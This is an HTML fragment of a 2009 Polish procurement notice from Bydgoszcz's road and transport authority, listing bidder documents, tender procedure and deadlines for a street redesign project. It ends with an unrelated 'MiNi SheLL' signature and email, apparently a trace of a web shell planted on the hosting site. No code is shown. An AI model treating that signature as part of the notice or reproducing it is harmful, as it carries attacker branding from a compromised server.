<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia spełniania warunków udziału w postępowaniu, określonych w pkt. 10.1. SIWZ, Wykonawca składa przez dołączenie do oferty, w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (tj. osobę/y uprawnioną/e 
do reprezentowania Wykonawcy i składania oświadczeń woli w jego imieniu) następujące oświadczenia i dokumenty: 
1.	Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 UPZP, określonych na podstawie art. 22 ust. 1 UPZP (wg wzoru Zamawiającego).
2.	uprawnienia zawodowe do projektowania, wymagane przepisami ustawy Prawo 
Budowlane w specjalnościach:
-	drogowej, 
-	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych, 
-	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych.
3.	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia; (wg wzoru Zamawiającego),
4.	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 11.1.2.3) SIWZ, Wykonawca wskazał osoby, którymi będzie dysponował.
5. wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzających spełnienie warunku udziału określonego w pkt 10.1.2. SIWZ z podaniem dat wykonania, przedmiotu i odbiorców (wg wzoru Zamawiającego),
6. dokumenty potwierdzające - minimum jeden (np. jedna referencja), że usługi wykonane, przedstawione w ww. wykazie zostały wykonane należycie. 

7. oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 UPZP (wg wzoru Zamawiającego);
8. aktualny/e odpis/y z właściwego rejestru albo aktualne zaświadczenie/a o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione 
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
9. aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, 
że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdmikp.bydgoszcz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich i Komunikacji Publicznej ul. Toruńska 174a, 85-830 Bydgoszcz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2009 godzina 09:50, miejsce: Zarząd Dróg Miejskich i Komunikacji Publicznej ul. Toruńska 174a, 85-830 Bydgoszcz, pokój nr 20 (kancelaria/parter)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający ustala maksymalny termin realizacji zamówienia od daty podpisania umowy:
ETAP I 	dostarczenie koncepcji komunikacyjnej obszaru Śródmieścia i architektonicznej dla przebudowy ulicy: 31.01.2010 r.
ETAP II	dostarczenie projektów wykonawczych, przedmiarów robót, kosztorysu inwestorskiego i szczegółowych specyfikacji technicznych: 15.07.2010 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com